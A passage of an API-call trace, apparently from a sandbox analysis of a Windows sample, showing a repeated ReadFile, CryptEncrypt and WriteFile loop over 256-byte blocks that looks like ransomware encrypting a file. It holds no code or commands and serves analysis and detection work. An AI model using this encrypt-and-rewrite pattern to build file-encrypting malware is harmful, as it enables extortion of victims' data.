lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.095] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.095] GetLastError () returned 0x0 [0167.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.095] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.095] GetLastError () returned 0x0 [0167.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.095] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.095] GetLastError () returned 0x0 [0167.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.096] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.096] GetLastError () returned 0x0 [0167.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.096] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.096] GetLastError () returned 0x0 [0167.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.096] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.096] GetLastError () returned 0x0 [0167.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.096] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.096] GetLastError () returned 0x0 [0167.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.096] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.096] GetLastError () returned 0x0 [0167.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.096] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.096] GetLastError () returned 0x0 [0167.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.096] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.097] GetLastError () returned 0x0 [0167.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.097] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.097] GetLastError () returned 0x0 [0167.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.097] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.097] GetLastError () returned 0x0 [0167.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.097] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.097] GetLastError () returned 0x0 [0167.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.097] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.097] GetLastError () returned 0x0 [0167.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.097] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.097] GetLastError () returned 0x0 [0167.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.097] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.097] GetLastError () returned 0x0 [0167.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.098] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.098] GetLastError () returned 0x0 [0167.098] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.098] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.098] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.098] GetLastError () returned 0x0 [0167.098] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.098] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.098] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.098] GetLastError () returned 0x0 [0167.098] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.098] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.098] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.098] GetLastError () returned 0x0 [0167.098] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.098] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.098] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.098] GetLastError () returned 0x0 [0167.098] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.098] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.098] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.098] GetLastError () returned 0x0 [0167.098] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.098] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.099] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.099] GetLastError () returned 0x0 [0167.099] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.099] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.099] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.099] GetLastError () returned 0x0 [0167.099] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.099] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.099] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.099] GetLastError () returned 0x0 [0167.099] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.099] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.099] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.099] GetLastError () returned 0x0 [0167.099] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.099] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.099] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.099] GetLastError () returned 0x0 [0167.099] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.099] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.099] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.099] GetLastError () returned 0x0 [0167.099] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.099] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.099] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.099] GetLastError () returned 0x0 [0167.099] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.100] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.100] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.100] GetLastError () returned 0x0 [0167.100] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.100] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.100] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.100] GetLastError () returned 0x0 [0167.100] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.100] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.100] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.100] GetLastError () returned 0x0 [0167.100] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.100] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.100] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, 